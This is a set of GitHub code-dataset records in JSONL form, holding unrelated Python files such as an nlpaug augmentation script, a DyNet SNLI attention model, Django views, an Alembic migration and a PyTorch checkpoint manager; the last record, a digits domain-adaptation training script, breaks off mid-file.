make com zero SNR\n if numpy.amax(data['SNR'][nm2]*(True^comindx)*goodak) == 0.: #all commissioning or bad ak, treat all equally\n hisnr= numpy.argmax(data['SNR'][nm2])\n tindx= numpy.ones(len(nm2),dtype='bool')\n tindx[hisnr]= False\n tdata['RA'][nm2[tindx]]= -9999\n return tdata[tdata['RA'] != -9999]\n\n","repo_name":"jbirky/apogee_tools","sub_path":"apogee_tools/apogee_hack/tools/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":33573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73471468353","text":"################################################################################\n# Imports\n################################################################################\nimport os\nimport re\nimport pandas as pd\nimport numpy as np\nimport argparse\nimport nlpaug.augmenter.char as nac\nfrom tqdm import tqdm\n\n\n################################################################################\n# Parameters\n################################################################################\nap = argparse.ArgumentParser()\nap.add_argument(\"--input\", required=True, type=str,\n help=\"input file of unaugmented data\")\nap.add_argument(\"--da_type\", required=True, type=str,\n help=\"The types of data augmentations wanted out of \" +\n \"{ocr, key, randin, randsub, randswap, randdel}\")\nap.add_argument(\"--num_aug\", default=1, required=False, type=int,\n help=\"number of augmented sentences per original sentence\")\nap.add_argument(\"--alpha\", default=.25, required=False, type=float,\n help=\"percent of words in each sentence to be changed\")\nap.add_argument(\"--alpha_char\", default=.25, required=False, type=float,\n help=\"percent of characters in each word to be changed\")\nap.add_argument(\"--output_dir\", default='./', required=False, type=str,\n help=\"directory to save output\")\nargs = ap.parse_args()\n\n\n################################################################################\n# Helper Functions\n################################################################################\ndef get_only_chars(line):\n clean_line = \"\"\n\n line = line.replace(\"’\", \"\")\n line = line.replace(\"'\", \"\")\n line = line.replace(\"-\", \" \") # replace hyphens with spaces\n line = line.replace(\"\\t\", \" \")\n line = line.replace(\"\\n\", \" \")\n line = line.lower()\n\n for char in line:\n if char in 'qwertyuiopasdfghjklzxcvbnm 1234567890#':\n clean_line += char\n else:\n clean_line += ' '\n\n clean_line = re.sub(' +', ' ', clean_line) # delete extra spaces\n if clean_line[0] == ' ':\n clean_line = clean_line[1:]\n return clean_line\n\n\n################################################################################\n# Character-Level Augmentation Functions\n################################################################################\n# Optical character augmentation\ndef ocr_aug(sentence, a_c,\n a_w, n):\n aug = nac.OcrAug(aug_char_p=a_c, aug_word_p=a_w)\n aug_sentences = aug.augment(sentence, n=n)\n if type(aug_sentences) == list:\n return aug_sentences\n else:\n return [aug_sentences]\n\n\n# Keyboard distance augmentation\ndef key_aug(sentence, a_c,\n a_w, n):\n aug = nac.KeyboardAug(aug_char_p=a_c, aug_word_p=a_w)\n aug_sentences = aug.augment(sentence, n=n)\n if type(aug_sentences) == list:\n return aug_sentences\n else:\n return [aug_sentences]\n\n\n# Random augmentation\ndef rand_aug(sentence, action, a_c,\n a_w, n):\n aug = nac.RandomCharAug(action=action, aug_char_p=a_c, aug_word_p=a_w)\n 
aug_sentences = aug.augment(sentence, n=n)\n    if type(aug_sentences) == list:\n        return aug_sentences\n    else:\n        return [aug_sentences]\n\n\n################################################################################\n# Top Level Augmentation Functions\n################################################################################\n# Augment a single example\ndef augment(sentence, da, alpha, num_aug, alpha_char):\n    sentence = get_only_chars(sentence)\n    augmented_sentences = []\n    num_new_per_technique = int(np.ceil(num_aug / len(da)))\n\n    # Character Level\n    if 'ocr' in da:\n        augmented_sentences += ocr_aug(sentence, a_c=alpha_char,\n                                       a_w=alpha, n=num_new_per_technique)\n    if 'key' in da:\n        augmented_sentences += key_aug(sentence, a_c=alpha_char,\n                                       a_w=alpha, n=num_new_per_technique)\n    if 'rand_in' in da:\n        augmented_sentences += rand_aug(sentence, 'insert', a_c=alpha_char,\n                                        a_w=alpha, n=num_new_per_technique)\n    if 'rand_sub' in da:\n        augmented_sentences += rand_aug(sentence, 'sub', a_c=alpha_char,\n                                        a_w=alpha, n=num_new_per_technique)\n    if 'rand_swap' in da:\n        augmented_sentences += rand_aug(sentence, 'swap', a_c=alpha_char,\n                                        a_w=alpha, n=num_new_per_technique)\n    if 'rand_del' in da:\n        augmented_sentences += rand_aug(sentence, 'delete', a_c=alpha_char,\n                                        a_w=alpha, n=num_new_per_technique)\n\n    # Remove excess examples\n    augmented_sentences = [get_only_chars(sentence) for sentence in augmented_sentences]\n    np.random.shuffle(augmented_sentences)\n    if len(da) >= 1:\n        augmented_sentences = augmented_sentences[:num_aug]\n\n    if len(augmented_sentences) < num_aug:\n        augmented_sentences += [sentence]*(num_aug-len(augmented_sentences))\n\n    # Return\n    return augmented_sentences\n\n\n# Augment all data\ndef gen_nlpaug(train_orig, output_file, da_type, alpha=0.1, alpha_char=0.25, num_aug=5):\n    # get data\n    data = pd.read_csv(train_orig)\n    targets = data['target'].values\n    texts = data['text'].values\n    # initialize output data\n    new_targets = np.zeros(num_aug * len(targets), dtype=int)\n    new_texts = np.empty(num_aug * len(targets), dtype=object)\n\n    for i, target in enumerate(tqdm(targets)):\n        sentence = texts[i]\n        # AUGMENT\n        aug_sentences = augment(sentence, da_type,\n                                alpha=alpha, num_aug=num_aug, alpha_char=alpha_char)\n\n        # Add to output\n        new_targets[(num_aug * i):num_aug * (i + 1)] = [target] * num_aug\n        new_texts[(num_aug * i):num_aug * (i + 1)] = aug_sentences\n\n    # Concatenate our list\n    output_targets = np.concatenate((targets, new_targets))\n    output_texts = np.concatenate((texts, new_texts))\n\n    # Create new dataframe and export into a csv\n    new_data = pd.DataFrame({'target': output_targets, 'text': output_texts})\n    new_data.to_csv(output_file, index=False)\n\n\n################################################################################\n# Main\n################################################################################\nif __name__ == \"__main__\":\n    da_type = args.da_type.split('_')\n    join_char = \"_\"\n    output = str(args.output_dir) + join_char.join(da_type) + \"_alpha_\" + str(args.alpha)\n    output += \"_alpha_char_\" + str(args.alpha_char)\n    output += \"_num_aug_\" + str(args.num_aug) + \".csv\"\n\n    gen_nlpaug(args.input, output, da_type, alpha=args.alpha,\n               alpha_char=args.alpha_char, num_aug=args.num_aug)\n","repo_name":"dkang9503/CS224N_WIN20","sub_path":"utils/aug2_scripts/char_aug_script.py","file_name":"char_aug_script.py","file_ext":"py","file_size_in_byte":6800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} 
+{"seq_id":"24368189667","text":"def remove_py_extension(input_file_path, output_file_path):\r\n with open(input_file_path, 'r') as input_file:\r\n lines = input_file.readlines()\r\n\r\n # Remove the '.py' extension from each line\r\n lines_without_py = [line.strip()[:-3] for line in lines]\r\n\r\n # Save the modified lines to the output file\r\n with open(output_file_path, 'w') as output_file:\r\n output_file.write(\"\\n\".join(lines_without_py))\r\n\r\n# Step 1: Define the path to the input file.txt\r\ninput_file_path = 'valide_testfiles.txt'\r\n\r\n# Step 2: Define the path to the output file without .py extension\r\noutput_file_path = 'file_without_py_extension.txt'\r\n\r\n# Step 3: Remove .py extension and save to the output file\r\nremove_py_extension(input_file_path, output_file_path)\r\n","repo_name":"yassinhamed/stage-stet","sub_path":"file_without_py_extension.py","file_name":"file_without_py_extension.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73708405634","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nmpl.rcParams['pdf.fonttype'] = 42\n\nimport optparse\nimport numpy as np\nimport statistics as stat\n\n# The goal of this script is to plot bin-level differences in norm counts for enriched peptides vs. background, in order to estimate relative levels of signal-to-noise across samples and runs\n\ncolors = ['#8dd3c7','#bebada','#fb8072','#80b1d3','#fdb462','#b3de69','#fccde5','#d9d9d9','#bc80bd','#ffffb3']\n\ndef main():\n usage = '%prog [options]'\n p = optparse.OptionParser()\n p.add_option('-i', '--input', help='Tab-delimited input file, with one row per input matrix. The first column should contain a simple string to be used in output to refer to this file. The second column should be a score matrix that will be used to make plots [None, REQ]')\n p.add_option('-b', '--bins', help='Bin file, in the format generated by the PepSIRF bin module. [None, REQ]')\n p.add_option('-u', '--upper', type=\"int\", help=\"Upper percentile to use to calculate average value for 'signal'. Must be between 0 and 100, inclusive. [None, REQ]\")\n p.add_option('-l', '--lower', type=\"int\", help=\"Lower percentile to use to calculate average value for 'noise'. Must be between 0 and 100, inclusive. [None, REQ]\")\n p.add_option('-o', '--out', help='Base name for output files. [None, REQ]')\n p.add_option('--fig', default=\"png\", help=\"Figure format to output.\")\n p.add_option('--width', default=15, type=int, help=\"Figure width. [15]\")\n p.add_option('--height', default=4, type=int, help=\"Figure height. [4]\")\n\n# p.add_option('--hpd', type=\"float\", help=\"Highest posterior density to use for calculation of mean and standard deviation. Must be between 0 and 1. 
[None, REQ]\")\n\n opts, args = p.parse_args()\n \n # Read in bins\n bins = readGroups(opts.bins)\n \n # Open figure \n fig,ax = plt.subplots(1,1,figsize=(opts.width, opts.height),facecolor='w')\n\n \n # Open output file for writing\n with open(\"%s.tsv\" % (opts.out), \"w\") as fout:\n #Write header for output file\n fout.write(\"Sample\\tFile\\tBin\\tUpper%d\\tLower%d\\tDifference\\n\" % (opts.upper, opts.lower))\n \n #Step through each score matrix file\n matCount=-1\n with open(opts.input, \"r\") as fin:\n for line in fin:\n matCount+=1\n fileStr,fileLoc = line.rstrip(\"\\n\").split(\"\\t\")\n \n # Read in matrix\n sD = parseCounts(fileLoc)\n \n \n for samp, cD in sD.items():\n\n # Create list to collect all bin diffs\n diffL = []\n\n for i, g in enumerate(bins):\n counts=[cD[each] for each in g]\n lo,hi = np.percentile(counts, [opts.lower, opts.upper])\n# lo,hi=get_hpd(counts,opts.hpd)\n\n upperVals = [x for x in counts if x>=hi]\n lowerVals = [x for x in counts if x<=lo]\n \n upAvg = np.mean(upperVals)\n loAvg = np.mean(lowerVals)\n \n diff = upAvg-loAvg\n diffL.append(diff)\n \n fout.write(\"%s\\t%s\\t%d\\t%.5f\\t%.5f\\t%.5f\\n\" % (samp, fileStr, i, upAvg, loAvg, diff))\n \n # Add line to plot\n ax.plot(list(range(len(diffL))), diffL, c=colors[matCount], label=fileStr, alpha=0.5)\n \n fig.legend()\n fig.savefig(\"%s.%s\" % (opts.out, opts.fig),dpi=300,bbox_inches='tight')\n\n#----------------------End of main()\n\n\ndef readGroups(file):\n g=[]\n with open(file, \"r\") as fin:\n for line in fin:\n cols=line.rstrip(\"\\n\").split(\"\\t\")\n if cols:\n g.append(cols)\n return g\n\n\ndef writeCounts(cd, outname):\n probeNames = sorted(cd[list(cd.keys())[0]].keys())\n sampNames = sorted(list(cd.keys()))\n with open(outname, \"w\") as fout:\n fout.write(\"Probe\\t%s\\n\" % (\"\\t\".join(sampNames)))\n for each in probeNames:\n fout.write(\"%s\\t%s\\n\" % (each, \"\\t\".join([str(cd[x][each]) for x in sampNames])))\n\n\ndef parseCounts(countFile, delim=\"\\t\"):\n counts={}\n with open(countFile, \"r\") as fin:\n lc=0\n for line in fin:\n lc+=1\n cols=line.rstrip(\"\\n\").split(delim)\n if lc == 1:\n names = cols[1:]\n for n in names:\n counts[n]={}\n else:\n for i, count in enumerate(cols[1:]):\n counts[names[i]][cols[0]] = float(count)\n return counts\n\n\ndef get_hpd(data, level):\n \"\"\"\n Return highest posterior density interval from a list,\n given the percent posterior density interval required.\n \"\"\"\n d = list(data)\n d.sort()\n\n nData = len(data)\n nIn = int(round(level * nData))\n if nIn < 2 :\n return None\n #raise RuntimeError(\"Not enough data. N data: %s\"%(len(data)))\n \n i = 0\n r = d[i+nIn-1] - d[i]\n for k in range(len(d) - (nIn - 1)) :\n rk = d[k+nIn-1] - d[k]\n if rk < r :\n r = rk\n i = k\n\n assert 0 <= i <= i+nIn-1 < len(d)\n \n return (d[i], d[i+nIn-1])\n\n\n###------------------------------------->>>> \n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"LadnerLab/PepSIRF","sub_path":"extensions/signal2noise.py","file_name":"signal2noise.py","file_ext":"py","file_size_in_byte":5432,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"698302","text":"#open command prompt or you're version of it\n#install pyshorteners\n#type \"pip install pyshorteners\" then press enter\n# Go !\n\nimport pyshorteners\nurl = input (\"Enter URL you want to shorten:\")\nshortener = pyshorteners. 
Shortener()\nx = shortener.tinyurl.short(url)\nprint(x)\n","repo_name":"Aceboone011/Tiny-URL-code.-","sub_path":"TinyURL.py","file_name":"TinyURL.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71335749314","text":"import sys\nn = int(sys.stdin.readline())\nlst = []\n\ncnt = 1\ni = 1\n\nwhile cnt <= n:\n\n if '666' in str(i):\n lst.append(i)\n cnt += 1\n i += 1\n else:\n i += 1\n\nprint(lst[-1])\n","repo_name":"kokoko12334/TIL2","sub_path":"baekjoon/1436.py","file_name":"1436.py","file_ext":"py","file_size_in_byte":202,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"8899048893","text":"from appium import webdriver\nfrom pages.start_page import StartPage\nfrom pages.login_page import LoginPage\nfrom pages.side_menu import SideMenu\n\n\nclass Application:\n\n def __init__(self, capabilities, mode, executor):\n self.capabilities = capabilities\n\n appium_server_url = 'mode not specified'\n if mode == \"local\":\n appium_server_url = f'http://{executor}:4723'\n elif mode == \"grid\":\n appium_server_url = f'http://{executor}:4444/wd/hub'\n\n self.driver = webdriver.Remote(appium_server_url, self.capabilities)\n self.driver.implicitly_wait(20)\n self.start_page = StartPage(self.driver)\n self.login_page = LoginPage(self.driver)\n self.side_menu = SideMenu(self.driver)\n\n def destroy(self):\n if self.driver:\n self.driver.quit()\n","repo_name":"eezudin/mobile2","sub_path":"helpers/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74148062914","text":"import argparse\nimport logging\nimport json\nimport random\nimport numpy as np\nimport dynet as dy\nfrom pathlib import Path\n\n# create logger\nlogger = logging.getLogger(\"mylog\")\nlogging.basicConfig(format='%(asctime)s %(message)s', level=logging.DEBUG)\n\n\ndef loggerSeparator():\n logger.info(\"-----\")\n\n\nclass Embedding:\n def __init__(self, fileName):\n loggerSeparator()\n logger.info(\"Reading word vectors \" + fileName)\n self.words = self.readVectorsFromFile(fileName)\n logger.info(\"Creating UNK vector\")\n self.UNK = self.createUNKVector()\n\n self.knownCounter = 0\n self.unknownCounter = 0\n\n def embedWord(self, word):\n if word in self.words:\n self.knownCounter += 1\n return self.words[word]\n\n self.unknownCounter += 1\n return self.UNK\n\n def embedWords(self, words):\n return np.array(map(self.embedWord, words))\n\n def createUNKVector(self):\n vectors = []\n for i, w in enumerate(self.words):\n if i > 100:\n break\n vectors.append(self.words[w])\n\n return np.average(vectors, axis=0)\n\n def readVectorsFromFile(self, fileName):\n words = {}\n with open(fileName, \"r\") as lines:\n for line in lines:\n vector = line.split()\n word = vector.pop(0)\n words[word] = np.array(map(float, vector))\n return words\n\n\nLABELS = {\n u\"entailment\": 0,\n u\"contradiction\": 1,\n u\"neutral\": 2\n}\n\n\nclass SNLIData:\n def __init__(self, type, fileName, embedding):\n loggerSeparator()\n logger.info(\"Reading data \" + type + \" \" + fileName)\n\n self.data = []\n\n with open(fileName) as lines:\n for line in lines:\n datum = json.loads(line)\n gold = datum[\"gold_label\"]\n if gold != u\"-\":\n label = LABELS[gold]\n sentence1 = embedding.embedWords(datum[\"sentence1\"].lower().rstrip(\".\").split())\n sentence2 = 
embedding.embedWords(datum[\"sentence2\"].lower().rstrip(\".\").split())\n\n self.data.append((sentence1, sentence2, label))\n\n logger.info(type + \" size # sent \" + str(len(self.data)))\n logger.info(\"Known words \" + str(embedding.knownCounter) + \" / Unknown words \" + str(embedding.unknownCounter))\n\n\nclass Model:\n def __init__(self, embeddingSize, hiddenSize, labelsSize):\n self.model = dy.Model()\n self.trainer = dy.AdamTrainer(self.model)\n\n self.embeddingLinear = self.model.add_parameters((embeddingSize, hiddenSize))\n\n self.mlpF1 = self.model.add_parameters((hiddenSize, hiddenSize))\n self.mlpF2 = self.model.add_parameters((hiddenSize, hiddenSize))\n\n self.mlpG1 = self.model.add_parameters((2 * hiddenSize, hiddenSize))\n self.mlpG2 = self.model.add_parameters((hiddenSize, hiddenSize))\n\n self.mlpH1 = self.model.add_parameters((2 * hiddenSize, hiddenSize))\n self.mlpH2 = self.model.add_parameters((hiddenSize, hiddenSize))\n\n self.finaLinear = self.model.add_parameters((hiddenSize, labelsSize))\n\n def predict(self, data):\n return [self.forward(s1, s2) for (s1, s2, label) in data]\n\n def accuracy(self, data):\n good = total = 0.0\n predicted = self.predict(data)\n golds = [label for (s1, s2, label) in data]\n\n for pred, gold in zip(predicted, golds):\n total += 1\n if pred == gold:\n good += 1\n\n return good / total\n\n def forward(self, sent1, sent2, label=None):\n \"\"\"\n :param sent1: inputTensor\n :param sent2: inputTensor\n :param label: integer, range [0, 2]\n :return: loss\n \"\"\"\n # Fix embedding\n eL = dy.parameter(self.embeddingLinear)\n sent1 = dy.inputTensor(sent1) * eL\n sent2 = dy.inputTensor(sent2) * eL\n\n # F step\n Lf1 = dy.parameter(self.mlpF1)\n Fsent1 = dy.rectify(dy.dropout(sent1, 0.2) * Lf1)\n Fsent2 = dy.rectify(dy.dropout(sent2, 0.2) * Lf1)\n Lf2 = dy.parameter(self.mlpF2)\n Fsent1 = dy.rectify(dy.dropout(Fsent1, 0.2) * Lf2)\n Fsent2 = dy.rectify(dy.dropout(Fsent2, 0.2) * Lf2)\n\n # Attention scoring\n score1 = Fsent1 * dy.transpose(Fsent2)\n prob1 = dy.softmax(score1)\n\n score2 = dy.transpose(score1)\n prob2 = dy.softmax(score2)\n\n # Align pairs using attention\n sent1Pairs = dy.concatenate_cols([sent1, prob1 * sent2])\n sent2Pairs = dy.concatenate_cols([sent2, prob2 * sent1])\n\n # G step\n Lg1 = dy.parameter(self.mlpG1)\n Gsent1 = dy.rectify(dy.dropout(sent1Pairs, 0.2) * Lg1)\n Gsent2 = dy.rectify(dy.dropout(sent2Pairs, 0.2) * Lg1)\n Lg2 = dy.parameter(self.mlpG2)\n Gsent1 = dy.rectify(dy.dropout(Gsent1, 0.2) * Lg2)\n Gsent2 = dy.rectify(dy.dropout(Gsent2, 0.2) * Lg2)\n\n # Sum\n Ssent1 = dy.sum_dim(Gsent1, [0])\n Ssent2 = dy.sum_dim(Gsent2, [0])\n\n concat = dy.transpose(dy.concatenate([Ssent1, Ssent2]))\n\n # H step\n Lh1 = dy.parameter(self.mlpH1)\n Hsent = dy.rectify(dy.dropout(concat, 0.2) * Lh1)\n Lh2 = dy.parameter(self.mlpH2)\n Hsent = dy.rectify(dy.dropout(Hsent, 0.2) * Lh2)\n\n # Final layer\n finalLayer = dy.parameter(self.finaLinear)\n # final = dy.softmax(dy.transpose(Hsent * finalLayer))\n final = dy.transpose(Hsent * finalLayer)\n\n if label != None: # Label can be 0...\n return dy.pickneglogsoftmax(final, label)\n else:\n out = dy.softmax(final)\n chosen = np.argmax(out.npvalue())\n return chosen\n\n def save(self, modelFile):\n self.model.save(modelFile)\n\n def load(self, modelFile):\n self.model.populate(modelFile)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(\n description=__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n parser.add_argument('--train', help='training data 
file (jsonl)',\n type=str, default='../snli_1.0/snli_1.0_train.jsonl')\n\n parser.add_argument('--dev', help='development data file (jsonl)',\n type=str, default='../snli_1.0/snli_1.0_dev.jsonl')\n\n parser.add_argument('--test', help='test data file (jsonl)',\n type=str, default='../snli_1.0/snli_1.0_test.jsonl')\n\n parser.add_argument('--w2v', help='pretrained word vectors file (word tab vector)',\n type=str, default='deps.words')\n\n parser.add_argument('--embedding_size', help='word embedding size',\n type=int, default=300)\n\n parser.add_argument('--epochs', help='training epochs',\n type=int, default=25)\n\n parser.add_argument('--dev_interval', help='interval for development',\n type=int, default=1)\n\n parser.add_argument('--display_interval', help='interval of display by batches',\n type=int, default=5)\n\n parser.add_argument('--batch', help='size of batch',\n type=int, default=20000)\n\n parser.add_argument('--model', help='path of model file (not include the name suffix',\n type=str, default='model.save')\n\n parser.add_argument('--dynet-autobatch', help='dynet parameter',\n type=int, default=1)\n\n parser.add_argument('--dynet-mem', help='dynet parameter',\n type=int, default=8192)\n\n args = parser.parse_args()\n\n for arg in vars(args):\n logger.info(str(arg) + ' ' + str(getattr(args, arg)))\n\n embedding = Embedding(args.w2v)\n\n # load train/dev/test data\n trainData = SNLIData(\"train\", args.train, embedding)\n devData = SNLIData(\"dev\", args.dev, embedding)\n testData = SNLIData(\"test\", args.test, embedding)\n\n model = Model(args.embedding_size, 300, len(LABELS))\n\n modelFileCache = Path(args.model)\n if modelFileCache.is_file():\n model.load(args.model)\n\n losses = []\n\n # accuracy = model.accuracy(testData.data)\n # logger.info(\"Test Accuracy: \" + str(accuracy))\n\n # accuracy = model.accuracy(trainData.data[:10000])\n # logger.info(\"Train Accuracy: \" + str(accuracy))\n\n loss = tagged = 0\n for EPOCH in range(args.epochs):\n loggerSeparator()\n logger.info(\"Starting epoch \" + str(EPOCH))\n random.shuffle(trainData.data)\n\n errors = []\n dy.renew_cg()\n for i, (s1, s2, label) in enumerate(trainData.data, 1):\n if i % (args.batch * args.display_interval) == 0:\n avgLoss = loss / tagged\n losses.append(avgLoss)\n logger.info(str(EPOCH) + \"/\" + str(i) + \": \" + str(avgLoss))\n loss = tagged = 0\n\n accuracy = model.accuracy(devData.data)\n logger.info(\"Dev Accuracy: \" + str(accuracy))\n\n model.save(args.model)\n\n if i % args.batch == 0:\n errorsSum = dy.esum(errors)\n loss += errorsSum.value()\n tagged += args.batch\n\n errorsSum.backward()\n model.trainer.update()\n\n dy.renew_cg()\n errors = []\n\n errors.append(model.forward(s1, s2, label))\n","repo_name":"AmitMY/SNLI-decomposable-attention-dynet","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9369,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72822319554","text":"from django.shortcuts import render\nfrom django.views.generic import TemplateView\n\nfrom tempview.models import TempModel\n# Create your views here.\n\n\n# def index(request):\n# data = TempModel.objects.all()\n# context = {\n# 'data': data,\n# }\n# return render(request, 'tempview/index.html', context)\n\n\nclass TempView(TemplateView):\n template_name = 'tempview/index.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n data = TempModel.objects.all()\n context['data'] = data\n return 
context\n\n\nclass TempDetailView(TemplateView):\n template_name = 'tempview/detail.html'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n id = kwargs['id']\n data = TempModel.objects.get(id=id)\n context['data'] = data\n return context\n","repo_name":"dev-SR/django","sub_path":"E_django_ClassViews/tempview/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"72237812353","text":"\"\"\"empty message\n\nRevision ID: 57f837f3f68a\nRevises: 6f064e32c53c\nCreate Date: 2023-04-27 11:39:46.959445\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '57f837f3f68a'\ndown_revision = '6f064e32c53c'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('family',\n sa.Column('relationship_id', sa.Integer(), nullable=False),\n sa.Column('family_id', sa.Integer(), nullable=False),\n sa.Column('parent_id', sa.Integer(), nullable=True),\n sa.Column('swimmer_id', sa.Integer(), nullable=True),\n sa.PrimaryKeyConstraint('relationship_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('family')\n # ### end Alembic commands ###\n","repo_name":"Cpierswim/SwimTeamManager","sub_path":"backend/migrations/versions/57f837f3f68a_.py","file_name":"57f837f3f68a_.py","file_ext":"py","file_size_in_byte":883,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"24511830352","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# PROGRAMMER: Kinan Turman\n# DATE CREATED: Feb. 23, 2019 \n# PURPOSE: A basic manager for saving and loading checkpoints. 
Used by train.py to save\n# a checkpoint and by predict.py to load a checkpoint/model to predict the classes for \n# a given image.\n\nimport torch\nimport build_model as bm\nimport torchvision\nfrom torchvision import datasets, models, utils\n\nimport os\n\ndef save_model(model, num_classes, class_to_idx_mapping, c_arch, hidden_units,\n learning_rate, dropout, path):\n\n \"\"\"\n This function saves the checkpoint\n\n Parameters:\n - model: the model we are saving (using state_dict())\n - num_classes: the output size\n - class_to_idx_mapping: the mapping of classes to indices which we get from the test set\n - c_arch: the choice of architecture\n - hidden_units: hidden units\n - learning_rate: the learning rate\n - dropout: the dropout\n - path: where we want to save the checkpoint\n\n Returns:\n - None\n \"\"\"\n\n model.class_to_idx = class_to_idx_mapping\n m_state_dict = model.state_dict()\n\n checkpoint = {'output_size': num_classes,\n 'dropout' : dropout,\n 'choice_model': c_arch,\n 'hidden_unit' : hidden_units,\n 'learning_rate': learning_rate,\n 'model_state_dict': m_state_dict,\n 'class_to_idx': model.class_to_idx}\n \n if path:\n # create the directory (first check that it does not exist):\n if not os.path.exists(path):\n os.mkdir(path)\n\n torch.save(checkpoint, path + '/' + 'checkpoint.pth')\n else:\n torch.save(checkpoint, 'checkpoint.pth')\n\n print('Model saved!')\n\ndef load_checkpoint(path):\n \"\"\"\n This loads a checkpoint\n\n Parameters:\n - path: path to the checkpoint (dir + filename)\n\n Returns:\n - None\n \"\"\"\n\n # load checkpoint\n checkpoint = torch.load(path)\n # load parameters\n num_classes = checkpoint['output_size']\n c_arch = checkpoint['choice_model']\n dropout = checkpoint['dropout']\n hidden_unit = checkpoint['hidden_unit']\n # load the model\n model = bm.initialize_model(c_arch, num_classes, hidden_unit, dropout)\n # load model state and class idx\n model.load_state_dict(checkpoint['model_state_dict'])\n model.class_to_idx = checkpoint['class_to_idx'] \n \n # print(\"Model Loaded: \", model)\n # print()\n #print(\"Class to idx: \", model.class_to_idx)\n\n return model","repo_name":"kinant/aipnd-project","sub_path":"checkpoint_manager.py","file_name":"checkpoint_manager.py","file_ext":"py","file_size_in_byte":2586,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32855405980","text":"import sys\nsys.path.append('..')\n\nimport argparse\nfrom configparser import ConfigParser\nimport ast\nimport os\nimport random\nfrom copy import deepcopy\n\nimport numpy as np\nimport torch\nfrom torch import nn, optim\nfrom torch.utils.data import Subset, DataLoader\nimport torchvision.transforms as T\n\nfrom datasets import MNIST, MNIST_M, SVHN, SynthDigits\nfrom models import SimpleCNN, MDANet, MODANet\nfrom routines import (fs_train_routine, fm_train_routine, dann_train_routine, mdan_train_routine, mdan_unif_train_routine,\n mdan_fm_train_routine, mdan_unif_fm_train_routine, moda_train_routine, moda_fm_train_routine)\nfrom utils import MSDA_Loader, Logger\nfrom augment import Flip\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Domain adaptation experiments with digits datasets.', formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('-m', '--model', default='MODAFM', type=str, metavar='', help='model type (\\'FS\\' / \\'DANNS\\' / \\'DANNM\\' / \\'MDAN\\' / \\'MODA\\' / \\'FM\\' / \\'MODAFM\\'')\n parser.add_argument('-d', '--data_path', 
default='/ctm-hdd-pool01/DB/', type=str, metavar='', help='data directory path')\n parser.add_argument('-t', '--target', default='MNIST', type=str, metavar='', help='target domain (\\'MNIST\\' / \\'MNIST_M\\' / \\'SVHN\\' / \\'SynthDigits\\')')\n parser.add_argument('-o', '--output', default='msda.pth', type=str, metavar='', help='model file (output of train)')\n parser.add_argument('--icfg', default=None, type=str, metavar='', help='config file (overrides args)')\n parser.add_argument('--n_src_images', default=20000, type=int, metavar='', help='number of images from each source domain')\n parser.add_argument('--n_tgt_images', default=20000, type=int, metavar='', help='number of images from the target domain')\n parser.add_argument('--mu_d', type=float, default=1e-2, help=\"hyperparameter of the coefficient for the domain discriminator loss\")\n parser.add_argument('--mu_s', type=float, default=0.2, help=\"hyperparameter of the non-sparsity regularization\")\n parser.add_argument('--mu_c', type=float, default=1e-1, help=\"hyperparameter of the FixMatch loss\")\n parser.add_argument('--n_rand_aug', type=int, default=2, help=\"N parameter of RandAugment\")\n parser.add_argument('--m_min_rand_aug', type=int, default=3, help=\"minimum M parameter of RandAugment\")\n parser.add_argument('--m_max_rand_aug', type=int, default=10, help=\"maximum M parameter of RandAugment\")\n parser.add_argument('--weight_decay', default=0., type=float, metavar='', help='hyperparameter of weight decay regularization')\n parser.add_argument('--lr', default=1e-1, type=float, metavar='', help='learning rate')\n parser.add_argument('--epochs', default=30, type=int, metavar='', help='number of training epochs')\n parser.add_argument('--batch_size', default=8, type=int, metavar='', help='batch size (per domain)')\n parser.add_argument('--checkpoint', default=0, type=int, metavar='', help='number of epochs between saving checkpoints (0 disables checkpoints)')\n parser.add_argument('--eval_target', default=False, type=int, metavar='', help='evaluate target during training')\n parser.add_argument('--use_cuda', default=True, type=int, metavar='', help='use CUDA capable GPU')\n parser.add_argument('--use_visdom', default=False, type=int, metavar='', help='use Visdom to visualize plots')\n parser.add_argument('--visdom_env', default='digits_train', type=str, metavar='', help='Visdom environment name')\n parser.add_argument('--visdom_port', default=8888, type=int, metavar='', help='Visdom port')\n parser.add_argument('--verbosity', 